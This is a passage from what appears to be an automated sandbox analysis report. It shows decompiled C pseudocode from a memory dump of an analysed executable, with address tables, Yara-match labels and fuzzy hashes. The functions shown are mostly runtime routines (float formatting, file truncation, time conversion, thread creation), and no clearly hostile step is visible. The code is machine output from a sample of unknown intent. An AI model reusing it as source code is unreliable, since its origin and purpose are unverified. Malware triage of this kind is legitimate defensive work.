								_t121 = _t119 + _t161 & 0x0000ffff;
								__eflags = _t121 - 0x39;
								if(_t121 > 0x39) {
									_t121 = _t121 + _t136;
									__eflags = _t121;
								}
								_t162 = _v20;
								_t172 = _a4;
								 *_t186 = _t121;
								_t186 = _t186 + 1;
								_v8 = (_t162 << 0x00000020 | _v8) >> 4;
								_t147 = _t162 >> 4;
								_t93 = _v12 - 4;
								_t181 = _t181 - 1;
								_v20 = _t162 >> 4;
								_v12 = _t93;
								__eflags = _t93;
							} while (_t93 >= 0);
							__eflags = _t93;
							if(_t93 < 0) {
								goto L39;
							}
							_t115 = E00447240( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
							__eflags = _t115 - 8;
							if(_t115 <= 8) {
								goto L39;
							}
							_t54 = _t186 - 1; // 0xff8bc35f
							_t116 = _t54;
							_t138 = 0x30;
							while(1) {
								_t156 =  *_t116;
								__eflags = _t156 - 0x66;
								if(_t156 == 0x66) {
									goto L33;
								}
								__eflags = _t156 - 0x46;
								if(_t156 != 0x46) {
									_t139 = _v32;
									__eflags = _t116 - _v28;
									if(_t116 == _v28) {
										_t57 = _t116 - 1;
										 *_t57 =  *(_t116 - 1) + 1;
										__eflags =  *_t57;
									} else {
										_t157 =  *_t116;
										__eflags = _t157 - 0x39;
										if(_t157 != 0x39) {
											 *_t116 = _t157 + 1;
										} else {
											 *_t116 = _t139 + 0x3a;
										}
									}
									goto L39;
								}
								L33:
								 *_t116 = _t138;
								_t116 = _t116 - 1;
							}
						} else {
							__eflags =  *_t172;
							if( *_t172 <= 0) {
								L39:
								__eflags = _t181;
								if(_t181 > 0) {
									_push(_t181);
									_t111 = 0x30;
									_push(_t111);
									_push(_t186);
									E0042B710(_t181);
									_t186 = _t186 + _t181;
									__eflags = _t186;
								}
								_t94 = _v28;
								__eflags =  *_t94;
								if( *_t94 == 0) {
									_t186 = _t94;
								}
								__eflags = _a28;
								 *_t186 = ((_t94 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								_t174 = _a4[1];
								_t100 = E00447240( *_a4, 0x34, _t174);
								_t137 = 0;
								_t151 = (_t100 & 0x000007ff) - _v16;
								__eflags = _t151;
								asm("sbb ebx, ebx");
								if(__eflags < 0) {
									L47:
									 *(_t186 + 1) = 0x2d;
									_t187 = _t186 + 2;
									__eflags = _t187;
									_t151 =  ~_t151;
									asm("adc ebx, 0x0");
									_t137 =  ~_t137;
									goto L48;
								} else {
									if(__eflags > 0) {
										L46:
										 *(_t186 + 1) = 0x2b;
										_t187 = _t186 + 2;
										L48:
										_t182 = _t187;
										_t101 = 0x30;
										 *_t187 = _t101;
										__eflags = _t137;
										if(__eflags < 0) {
											L56:
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L60:
												_push(0);
												_push(0xa);
												_push(_t137);
												_push(_t151);
												_t102 = E00447000();
												_v32 = _t174;
												 *_t187 = _t102 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												L61:
												_t104 = 0x30;
												_t183 = 0;
												__eflags = 0;
												 *_t187 = _t151 + _t104;
												 *(_t187 + 1) = 0;
												goto L62;
											}
											__eflags = _t137;
											if(__eflags < 0) {
												goto L61;
											}
											if(__eflags > 0) {
												goto L60;
											}
											__eflags = _t151 - 0xa;
											if(_t151 < 0xa) {
												goto L61;
											}
											goto L60;
										}
										if(__eflags > 0) {
											L51:
											_push(0);
											_push(0x3e8);
											_push(_t137);
											_push(_t151);
											_t107 = E00447000();
											_v32 = _t174;
											 *_t187 = _t107 + 0x30;
											_t187 = _t187 + 1;
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L55:
												_push(0);
												_push(0x64);
												_push(_t137);
												_push(_t151);
												_t109 = E00447000();
												_v32 = _t174;
												 *_t187 = _t109 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												goto L56;
											}
											L52:
											__eflags = _t137;
											if(__eflags < 0) {
												goto L56;
											}
											if(__eflags > 0) {
												goto L55;
											}
											__eflags = _t151 - 0x64;
											if(_t151 < 0x64) {
												goto L56;
											}
											goto L55;
										}
										__eflags = _t151 - 0x3e8;
										if(_t151 < 0x3e8) {
											goto L52;
										}
										goto L51;
									}
									__eflags = _t151;
									if(_t151 < 0) {
										goto L47;
									}
									goto L46;
								}
							}
							goto L23;
						}
					}
					__eflags = 0;
					if(0 != 0) {
						goto L11;
					} else {
						_t183 = E00439297(0, _t142, 0, _t172, _t184, _a12, _a16, _a20, _t181, 0, _a32, 0);
						__eflags = _t183;
						if(_t183 == 0) {
							_t128 = E00447320(_t184, 0x65);
							_pop(_t166);
							__eflags = _t128;
							if(_t128 != 0) {
								__eflags = _a28;
								_t170 = ((_t166 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								__eflags = _t170;
								 *_t128 = _t170;
								 *((char*)(_t128 + 3)) = 0;
							}
							_t183 = 0;
						} else {
							 *_t184 = 0;
						}
						goto L62;
					}
				} else {
					_t129 = E00432914();
					_t183 = 0x22;
					 *_t129 = _t183;
					E00430C7A();
					L62:
					if(_v40 != 0) {
						 *(_v52 + 0x350) =  *(_v52 + 0x350) & 0xfffffffd;
					}
					return _t183;
				}
			}
























































                                            0x00438f94
                                            0x00438f9f
                                            0x00438fa6
                                            0x00438fa8
                                            0x00438fa8
                                            0x00438faa
                                            0x00438fb3
                                            0x00438fb5
                                            0x00438fba
                                            0x00438fc0
                                            0x00438fd6
                                            0x00438fdb
                                            0x00438fde
                                            0x00438feb
                                            0x00438ff0
                                            0x00439044
                                            0x0043904c
                                            0x0043904e
                                            0x00439050
                                            0x00439053
                                            0x00439053
                                            0x00439053
                                            0x00439059
                                            0x00439061
                                            0x00439074
                                            0x00439077
                                            0x00439079
                                            0x0043907c
                                            0x0043907d
                                            0x0043909e
                                            0x004390a1
                                            0x004390a1
                                            0x0043907f
                                            0x0043907f
                                            0x00439081
                                            0x0043908c
                                            0x0043908c
                                            0x0043908e
                                            0x00439095
                                            0x00439090
                                            0x00439090
                                            0x00439090
                                            0x0043908e
                                            0x004390a2
                                            0x004390a4
                                            0x004390a5
                                            0x004390a8
                                            0x004390aa
                                            0x004390b4
                                            0x004390be
                                            0x004390ac
                                            0x004390ac
                                            0x004390ac
                                            0x004390c3
                                            0x004390c3
                                            0x004390c8
                                            0x004390cb
                                            0x004390d6
                                            0x004390d6
                                            0x004390d6
                                            0x004390d6
                                            0x004390da
                                            0x004390e1
                                            0x004390e2
                                            0x004390e5
                                            0x004390e8
                                            0x004390e8
                                            0x004390ea
                                            0x00000000
                                            0x00000000
                                            0x00439102
                                            0x00439109
                                            0x0043910d
                                            0x00439110
                                            0x00439113
                                            0x00439115
                                            0x00439115
                                            0x00439115
                                            0x00439117
                                            0x0043911a
                                            0x0043911d
                                            0x0043911f
                                            0x00439127
                                            0x0043912d
                                            0x00439130
                                            0x00439133
                                            0x00439134
                                            0x00439137
                                            0x0043913a
                                            0x0043913a
                                            0x0043913f
                                            0x00439142
                                            0x00000000
                                            0x00000000
                                            0x0043915a
                                            0x0043915f
                                            0x00439163
                                            0x00000000
                                            0x00000000
                                            0x00439167
                                            0x00439167
                                            0x0043916a
                                            0x0043916b
                                            0x0043916b
                                            0x0043916d
                                            0x00439170
                                            0x00000000
                                            0x00000000
                                            0x00439172
                                            0x00439175
                                            0x0043917c
                                            0x0043917f
                                            0x00439182
                                            0x00439198
                                            0x00439198
                                            0x00439198
                                            0x00439184
                                            0x00439184
                                            0x00439186
                                            0x00439189
                                            0x00439194
                                            0x0043918b
                                            0x0043918e
                                            0x0043918e
                                            0x00439189
                                            0x00000000
                                            0x00439182
                                            0x00439177
                                            0x00439177
                                            0x00439179
                                            0x00439179
                                            0x004390cd
                                            0x004390cd
                                            0x004390d0
                                            0x0043919b
                                            0x0043919b
                                            0x0043919d
                                            0x0043919f
                                            0x004391a2
                                            0x004391a3
                                            0x004391a4
                                            0x004391a5
                                            0x004391ad
                                            0x004391ad
                                            0x004391ad
                                            0x004391af
                                            0x004391b2
                                            0x004391b5
                                            0x004391b7
                                            0x004391b7
                                            0x004391b9
                                            0x004391cb
                                            0x004391cf
                                            0x004391d2
                                            0x004391d9
                                            0x004391e1
                                            0x004391e1
                                            0x004391e4
                                            0x004391e6
                                            0x004391f7
                                            0x004391f7
                                            0x004391fb
                                            0x004391fb
                                            0x004391fe
                                            0x00439200
                                            0x00439203
                                            0x00000000
                                            0x004391e8
                                            0x004391e8
                                            0x004391ee
                                            0x004391ee
                                            0x004391f2
                                            0x00439205
                                            0x00439205
                                            0x00439209
                                            0x0043920a
                                            0x0043920c
                                            0x0043920e
                                            0x0043924f
                                            0x0043924f
                                            0x00439251
                                            0x0043925e
                                            0x0043925e
                                            0x00439260
                                            0x00439262
                                            0x00439263
                                            0x00439264
                                            0x0043926b
                                            0x0043926e
                                            0x00439270
                                            0x00439270
                                            0x00439271
                                            0x00439273
                                            0x00439276
                                            0x00439276
                                            0x00439278
                                            0x0043927a
                                            0x00000000
                                            0x0043927a
                                            0x00439253
                                            0x00439255
                                            0x00000000
                                            0x00000000
                                            0x00439257
                                            0x00000000
                                            0x00000000
                                            0x00439259
                                            0x0043925c
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0043925c
                                            0x00439215
                                            0x0043921b
                                            0x0043921b
                                            0x0043921d
                                            0x0043921e
                                            0x0043921f
                                            0x00439220
                                            0x00439227
                                            0x0043922a
                                            0x0043922c
                                            0x0043922d
                                            0x0043922f
                                            0x0043923c
                                            0x0043923c
                                            0x0043923e
                                            0x00439240
                                            0x00439241
                                            0x00439242
                                            0x00439249
                                            0x0043924c
                                            0x0043924e
                                            0x0043924e
                                            0x00000000
                                            0x0043924e
                                            0x00439231
                                            0x00439231
                                            0x00439233
                                            0x00000000
                                            0x00000000
                                            0x00439235
                                            0x00000000
                                            0x00000000
                                            0x00439237
                                            0x0043923a
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0043923a
                                            0x00439217
                                            0x00439219
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00439219
                                            0x004391ea
                                            0x004391ec
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004391ec
                                            0x004391e6
                                            0x00000000
                                            0x004390d0
                                            0x004390cb
                                            0x00438ff2
                                            0x00438ff4
                                            0x00000000
                                            0x00438ff6
                                            0x0043900c
                                            0x00439011
                                            0x00439013
                                            0x0043901f
                                            0x00439025
                                            0x00439026
                                            0x00439028
                                            0x0043902a
                                            0x00439035
                                            0x00439035
                                            0x00439038
                                            0x0043903a
                                            0x0043903a
                                            0x0043903d
                                            0x00439015
                                            0x00439015
                                            0x00439015
                                            0x00000000
                                            0x00439013
                                            0x00438fc2
                                            0x00438fc2
                                            0x00438fc9
                                            0x00438fca
                                            0x00438fcc
                                            0x0043927e
                                            0x00439282
                                            0x00439287
                                            0x00439287
                                            0x00439296
                                            0x00439296

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: __alldvrm$_strrchr
                                            • String ID:
                                            • API String ID: 1036877536-0
                                            • Opcode ID: a9fb3fa798b81bf9bbd29aed3b795f85de9b6a22d7b94382eb7f3f4cf805f68d
                                            • Instruction ID: 3fbcf157c5971136cafeea25d491e9d5c805e6f00b5febd5aa1e144c72c207fd
                                            • Opcode Fuzzy Hash: a9fb3fa798b81bf9bbd29aed3b795f85de9b6a22d7b94382eb7f3f4cf805f68d
                                            • Instruction Fuzzy Hash: 56A148729046869FEB25CF18C8817AFBBA1EF59314F1445AFE445AB342C2BC8D41C759
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0044677A, Relevance: 6.2, APIs: 4, Instructions: 152COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 94%
                                            			E0044677A(signed int __edx, intOrPtr _a4, intOrPtr _a8, int _a12) {
				int _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				signed int _t17;
				int _t20;
				signed int _t21;
				int _t23;
				signed int _t25;
				int _t28;
				intOrPtr* _t30;
				int _t34;
				int _t35;
				void* _t36;
				intOrPtr* _t37;
				intOrPtr* _t38;
				int _t46;
				void* _t54;
				void* _t56;
				signed int _t58;
				int _t61;
				int _t63;
				void* _t64;
				void* _t65;
				void* _t66;

				_t58 = __edx;
				_t59 = _a4;
				_t61 = 0;
				_t16 = E0043B351(_a4, 0, 0, 1);
				_v20 = _t16;
				_v16 = __edx;
				_t65 = _t64 + 0x10;
				if((_t16 & __edx) != 0xffffffff) {
					_t17 = E0043B351(_t59, 0, 0, 2);
					_t66 = _t65 + 0x10;
					_t51 = _t17 & __edx;
					__eflags = (_t17 & __edx) - 0xffffffff;
					if((_t17 & __edx) == 0xffffffff) {
						goto L1;
					}
					_t46 = _a8 - _t17;
					__eflags = _t46;
					_t20 = _a12;
					asm("sbb eax, edx");
					_v8 = _t20;
					if(__eflags < 0) {
						L24:
						__eflags = _t20 - _t61;
						if(__eflags > 0) {
							L19:
							_t21 = E0043B351(_t59, _v20, _v16, _t61);
							__eflags = (_t21 & _t58) - 0xffffffff;
							if((_t21 & _t58) != 0xffffffff) {
								_t23 = 0;
								__eflags = 0;
								L31:
								return _t23;
							}
							L20:
							_t23 =  *((intOrPtr*)(E00432914()));
							goto L31;
						}
						if(__eflags < 0) {
							L27:
							_t25 = E0043B351(_t59, _a8, _a12, _t61);
							_t66 = _t66 + 0x10;
							__eflags = (_t25 & _t58) - 0xffffffff;
							if((_t25 & _t58) == 0xffffffff) {
								goto L20;
							}
							_t28 = SetEndOfFile(E0043DF08(_t59));
							__eflags = _t28;
							if(_t28 != 0) {
								goto L19;
							}
							 *((intOrPtr*)(E00432914())) = 0xd;
							_t30 = E00432901();
							 *_t30 = GetLastError();
							goto L20;
						}
						__eflags = _t46 - _t61;
						if(_t46 >= _t61) {
							goto L19;
						}
						goto L27;
					}
					if(__eflags > 0) {
						L6:
						_t63 = E004368EF(_t51, 0x1000, 1);
						_pop(_t54);
						__eflags = _t63;
						if(_t63 != 0) {
							_v12 = E00435327(_t54, _t59, 0x8000);
							_t34 = _v8;
							_pop(_t56);
							do {
								__eflags = _t34;
								if(__eflags < 0) {
									L13:
									_t35 = _t46;
									L14:
									_t36 = E0043AA9C(_t46, _t59, _t63, _t59, _t63, _t35);
									_t66 = _t66 + 0xc;
									__eflags = _t36 - 0xffffffff;
									if(_t36 == 0xffffffff) {
										_t37 = E00432901();
										__eflags =  *_t37 - 5;
										if( *_t37 == 5) {
											 *((intOrPtr*)(E00432914())) = 0xd;
										}
										L23:
										_t38 = E00432914();
										E00437795(_t63);
										_t23 =  *_t38;
										goto L31;
									}
									asm("cdq");
									_t46 = _t46 - _t36;
									_t34 = _v8;
									asm("sbb eax, edx");
									_v8 = _t34;
									__eflags = _t34;
									if(__eflags > 0) {
										L12:
										_t35 = 0x1000;
										goto L14;
									}
									if(__eflags < 0) {
										break;
									}
									goto L17;
								}
								if(__eflags > 0) {
									goto L12;
								}
								__eflags = _t46 - 0x1000;
								if(_t46 < 0x1000) {
									goto L13;
								}
								goto L12;
								L17:
								__eflags = _t46;
							} while (_t46 != 0);
							E00435327(_t56, _t59, _v12);
							E00437795(_t63);
							_t66 = _t66 + 0xc;
							_t61 = 0;
							__eflags = 0;
							goto L19;
						}
						 *((intOrPtr*)(E00432914())) = 0xc;
						goto L23;
					}
					__eflags = _t46;
					if(_t46 <= 0) {
						goto L24;
					}
					goto L6;
				}
				L1:
				return  *((intOrPtr*)(E00432914()));
			}
































                                            0x0044677a
                                            0x00446784
                                            0x00446787
                                            0x0044678e
                                            0x00446795
                                            0x0044679a
                                            0x0044679d
                                            0x004467a3
                                            0x004467b6
                                            0x004467bd
                                            0x004467c0
                                            0x004467c2
                                            0x004467c5
                                            0x00000000
                                            0x00000000
                                            0x004467cb
                                            0x004467cb
                                            0x004467cd
                                            0x004467d0
                                            0x004467d2
                                            0x004467d5
                                            0x004468b3
                                            0x004468b3
                                            0x004468b5
                                            0x0044686c
                                            0x00446874
                                            0x0044687e
                                            0x00446881
                                            0x00446902
                                            0x00446902
                                            0x00446904
                                            0x00000000
                                            0x00446904
                                            0x00446883
                                            0x00446888
                                            0x00000000
                                            0x00446888
                                            0x004468b7
                                            0x004468bd
                                            0x004468c5
                                            0x004468cc
                                            0x004468cf
                                            0x004468d2
                                            0x00000000
                                            0x00000000
                                            0x004468dc
                                            0x004468e2
                                            0x004468e4
                                            0x00000000
                                            0x00000000
                                            0x004468eb
                                            0x004468f1
                                            0x004468fe
                                            0x00000000
                                            0x004468fe
                                            0x004468b9
                                            0x004468bb
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004468bb
                                            0x004467db
                                            0x004467e5
                                            0x004467f1
                                            0x004467f4
                                            0x004467f5
                                            0x004467f7
                                            0x00446815
                                            0x00446818
                                            0x0044681b
                                            0x0044681c
                                            0x0044681c
                                            0x0044681e
                                            0x00446831
                                            0x00446831
                                            0x00446833
                                            0x00446836
                                            0x0044683b
                                            0x0044683e
                                            0x00446841
                                            0x0044688c
                                            0x00446891
                                            0x00446894
                                            0x0044689b
                                            0x0044689b
                                            0x004468a1
                                            0x004468a1
                                            0x004468a9
                                            0x004468af
                                            0x00000000
                                            0x004468af
                                            0x00446843
                                            0x00446844
                                            0x00446846
                                            0x00446849
                                            0x0044684b
                                            0x0044684e
                                            0x00446850
                                            0x0044682a
                                            0x0044682a
                                            0x00000000
                                            0x0044682a
                                            0x00446852
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00446852
                                            0x00446820
                                            0x00000000
                                            0x00000000
                                            0x00446822
                                            0x00446828
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00446854
                                            0x00446854
                                            0x00446854
                                            0x0044685c
                                            0x00446862
                                            0x00446867
                                            0x0044686a
                                            0x0044686a
                                            0x00000000
                                            0x0044686a
                                            0x004467fe
                                            0x00000000
                                            0x004467fe
                                            0x004467dd
                                            0x004467df
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004467df
                                            0x004467a5
                                            0x00000000

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: _free
                                            • String ID:
                                            • API String ID: 269201875-0
                                            • Opcode ID: 1df42bdf6cbab097bb5271e4bf4fa666acafa07a06f17b19c478fdc3ddf116cb
                                            • Instruction ID: 9b05fb762471eb8a22ebcfd12e79e1d29d429bd91480c1cc89fb083e9960da52
                                            • Opcode Fuzzy Hash: 1df42bdf6cbab097bb5271e4bf4fa666acafa07a06f17b19c478fdc3ddf116cb
                                            • Instruction Fuzzy Hash: 05416B71A01514ABFB247BBA8C4577F3B64EF0B774F15111BF82896291EB7C8C0146AB
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00433C71, Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 95%
                                            			E00433C71(void* _a4, intOrPtr* _a8) {
				char _v5;
				intOrPtr _v12;
				char _v16;
				signed int _t44;
				char _t47;
				intOrPtr _t50;
				signed int _t52;
				signed int _t56;
				signed int _t57;
				void* _t59;
				signed int _t63;
				signed int _t65;
				char _t67;
				intOrPtr* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t75;
				void* _t76;
				void* _t77;
				signed int _t80;
				intOrPtr _t82;
				void* _t86;
				signed int _t87;
				void* _t89;
				signed int _t91;
				intOrPtr* _t98;
				void* _t101;
				intOrPtr _t102;
				intOrPtr _t103;

				_t101 = _a4;
				if(_t101 != 0) {
					_t80 = 9;
					memset(_t101, _t44 | 0xffffffff, _t80 << 2);
					_t98 = _a8;
					__eflags = _t98;
					if(_t98 != 0) {
						_t82 =  *((intOrPtr*)(_t98 + 4));
						_t47 =  *_t98;
						_v16 = _t47;
						_v12 = _t82;
						__eflags = _t82 - 0xffffffff;
						if(__eflags > 0) {
							L7:
							_t89 = 7;
							__eflags = _t82 - _t89;
							if(__eflags < 0) {
								L12:
								_v5 = 0;
								_t50 = E00433DBE(_t82, __eflags,  &_v16,  &_v5);
								_t75 = _v16;
								 *((intOrPtr*)(_t101 + 0x14)) = _t50;
								_t52 = E004470E0(_t75, _v12, 0x15180, 0);
								 *(_t101 + 0x1c) = _t52;
								_t86 = 0x44f0a4;
								_t76 = _t75 - _t52 * 0x15180;
								asm("sbb eax, edx");
								__eflags = _v5;
								if(_v5 == 0) {
									_t86 = 0x44f070;
								}
								_t91 =  *(_t101 + 0x1c);
								_t56 = 1;
								__eflags =  *((intOrPtr*)(_t86 + 4)) - _t91;
								if( *((intOrPtr*)(_t86 + 4)) >= _t91) {
									L16:
									_t57 = _t56 - 1;
									 *(_t101 + 0x10) = _t57;
									 *((intOrPtr*)(_t101 + 0xc)) = _t91 -  *((intOrPtr*)(_t86 + _t57 * 4));
									_t59 = E004470E0( *_t98,  *((intOrPtr*)(_t98 + 4)), 0x15180, 0);
									_t87 = 7;
									asm("cdq");
									 *(_t101 + 0x18) = (_t59 + 4) % _t87;
									_t63 = E004470E0(_t76, _v12, 0xe10, 0);
									 *(_t101 + 8) = _t63;
									_t77 = _t76 - _t63 * 0xe10;
									asm("sbb edi, edx");
									_t65 = E004470E0(_t77, _v12, 0x3c, 0);
									 *(_t101 + 0x20) =  *(_t101 + 0x20) & 0x00000000;
									 *(_t101 + 4) = _t65;
									_t67 = 0;
									__eflags = 0;
									 *_t101 = _t77 - _t65 * 0x3c;
									L17:
									return _t67;
								} else {
									do {
										_t56 = _t56 + 1;
										__eflags =  *((intOrPtr*)(_t86 + _t56 * 4)) - _t91;
									} while ( *((intOrPtr*)(_t86 + _t56 * 4)) < _t91);
									goto L16;
								}
							}
							if(__eflags > 0) {
								L10:
								_t68 = E00432914();
								_t102 = 0x16;
								 *_t68 = _t102;
								L11:
								_t67 = _t102;
								goto L17;
							}
							__eflags = _t47 - 0x934126cf;
							if(__eflags <= 0) {
								goto L12;
							}
							goto L10;
						}
						if(__eflags < 0) {
							goto L10;
						}
						__eflags = _t47 - 0xffff5740;
						if(_t47 < 0xffff5740) {
							goto L10;
						}
						goto L7;
					}
					_t69 = E00432914();
					_t102 = 0x16;
					 *_t69 = _t102;
					E00430C7A();
					goto L11;
				}
				_t71 = E00432914();
				_t103 = 0x16;
				 *_t71 = _t103;
				E00430C7A();
				return _t103;
			}
































                                            0x00433c7a
                                            0x00433c7f
                                            0x00433c9f
                                            0x00433ca0
                                            0x00433ca2
                                            0x00433ca5
                                            0x00433ca7
                                            0x00433cba
                                            0x00433cbd
                                            0x00433cbf
                                            0x00433cc2
                                            0x00433cc5
                                            0x00433cc8
                                            0x00433cd3
                                            0x00433cd5
                                            0x00433cd6
                                            0x00433cd8
                                            0x00433cf4
                                            0x00433cf8
                                            0x00433d01
                                            0x00433d06
                                            0x00433d0d
                                            0x00433d1a
                                            0x00433d1f
                                            0x00433d29
                                            0x00433d2e
                                            0x00433d33
                                            0x00433d35
                                            0x00433d3c
                                            0x00433d3e
                                            0x00433d3e
                                            0x00433d43
                                            0x00433d48
                                            0x00433d49
                                            0x00433d4c
                                            0x00433d54
                                            0x00433d54
                                            0x00433d55
                                            0x00433d63
                                            0x00433d6b
                                            0x00433d78
                                            0x00433d79
                                            0x00433d83
                                            0x00433d89
                                            0x00433d93
                                            0x00433d9a
                                            0x00433d9e
                                            0x00433da2
                                            0x00433da7
                                            0x00433dab
                                            0x00433db3
                                            0x00433db3
                                            0x00433db5
                                            0x00433db8
                                            0x00000000
                                            0x00433d4e
                                            0x00433d4e
                                            0x00433d4e
                                            0x00433d4f
                                            0x00433d4f
                                            0x00000000
                                            0x00433d4e
                                            0x00433d4c
                                            0x00433cda
                                            0x00433ce3
                                            0x00433ce3
                                            0x00433cea
                                            0x00433ceb
                                            0x00433ced
                                            0x00433ced
                                            0x00000000
                                            0x00433ced
                                            0x00433cdc
                                            0x00433ce1
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00433ce1
                                            0x00433cca
                                            0x00000000
                                            0x00000000
                                            0x00433ccc
                                            0x00433cd1
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00433cd1
                                            0x00433ca9
                                            0x00433cb0
                                            0x00433cb1
                                            0x00433cb3
                                            0x00000000
                                            0x00433cb3
                                            0x00433c81
                                            0x00433c88
                                            0x00433c89
                                            0x00433c8b
                                            0x00000000

                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 102ec99be6186879b9932c0d62072e0aa61a842dcd58850ef790ab73bfecec2f
                                            • Instruction ID: 985ff39d6ce20feda5b2ee0d72d200e5769febd96fb176805b2aeeda4c27c7bd
                                            • Opcode Fuzzy Hash: 102ec99be6186879b9932c0d62072e0aa61a842dcd58850ef790ab73bfecec2f
                                            • Instruction Fuzzy Hash: 07412E72600704AFE7249F39CC4179ABBE4EF8C715F10A62FF111DB691D77AAA418784
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00401997, Relevance: 6.1, APIs: 4, Instructions: 128synchronizationthreadCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 94%
                                            			E00401997(void* __ecx, void* __edx, intOrPtr _a4, _Unknown_base(*)()* _a8, char _a12) {
				signed int _v12;
				signed int _v16;
				void* _v20;
				char _v44;
				char _v68;
				void* __ebx;
				void* __esi;
				void* _t41;
				signed int _t46;
				void* _t70;
				void* _t73;
				void* _t74;
				struct _SECURITY_ATTRIBUTES* _t77;
				void* _t101;
				intOrPtr _t103;
				void* _t105;
				void* _t106;
				void* _t107;

				_t101 = __edx;
				_v12 = _v12 & 0x00000000;
				_t105 = __ecx;
				_v20 = __ecx;
				 *(__ecx + 0x48) =  *(__ecx + 0x48) & 0x00000000;
				E004020CF(_t74,  &_v44);
				_t103 = _a4;
				_t41 = _t105 + 0x4c;
				while(E00401B3D(_t105, E00401F2E(_t103),  &_v12, _t41) != 0) {
					_t46 =  *(_t105 + 0x40) & 0x000000ff;
					_v16 = _t46;
					if(_v12 + _t46 <= E00401F26()) {
						_t77 = 0;
						__eflags = 0;
					} else {
						_t77 = 1;
						_t73 = E00401F26();
						_t105 = _v20;
						_t103 = _a4;
						 *((intOrPtr*)(_t105 + 0x48)) = _v16 + _v12 - _t73;
					}
					if(_t77 == 0) {
						_t78 = _v16;
						E00401FA1( &_v44, _t101, _t105, E00401F0C(_t103,  &_v68, _v16, 0xffffffff));
						E00401F97();
						E00401FA1( &_v44, _t101, _t105, E00401F0C( &_v44,  &_v68, 0, _v12));
						E00401F97();
						_t112 = _a12;
						if(_a12 != 0) {
							E00401F7D(_t105 + 0x1c,  &_v44);
							 *(_t105 + 0x34) = CreateEventA(0, 0, 0, 0);
							__eflags = 0;
							CreateThread(0, 0, _a8, _t105, 0, 0);
							WaitForSingleObject( *(_t105 + 0x34), 0xffffffff);
							CloseHandle( *(_t105 + 0x34));
						} else {
							_t107 = _t106 - 0x18;
							E004020E6(_t78, _t107, _t101, _t112,  &_v44);
							_a8(_t105);
							_t106 = _t107 + 0x1c;
						}
						E00401FA1(_t103, _t101, _t105, E00401F0C(_t103,  &_v68, _v12 + _t78, 0xffffffff));
						E00401F97();
						_t70 = E00401F26();
						_t41 = _t105 + 0x4c;
						if(_t70 != 0) {
							continue;
						}
					}
					break;
				}
				return E00401F97();
			}





















                                            0x00401997
                                            0x0040199d
                                            0x004019a3
                                            0x004019a9
                                            0x004019ac
                                            0x004019b0
                                            0x004019b5
                                            0x004019b8
                                            0x004019bb
                                            0x004019d7
                                            0x004019e0
                                            0x004019ec
                                            0x00401a0a
                                            0x00401a0a
                                            0x004019ee
                                            0x004019f0
                                            0x004019f2
                                            0x004019fa
                                            0x00401a00
                                            0x00401a05
                                            0x00401a05
                                            0x00401a0e
                                            0x00401a14
                                            0x00401a29
                                            0x00401a31
                                            0x00401a4b
                                            0x00401a53
                                            0x00401a58
                                            0x00401a5f
                                            0x00401a79
                                            0x00401a8a
                                            0x00401a8d
                                            0x00401a97
                                            0x00401aa2
                                            0x00401aab
                                            0x00401a61
                                            0x00401a61
                                            0x00401a67
                                            0x00401a6d
                                            0x00401a70
                                            0x00401a70
                                            0x00401ac7
                                            0x00401acf
                                            0x00401ad6
                                            0x00401add
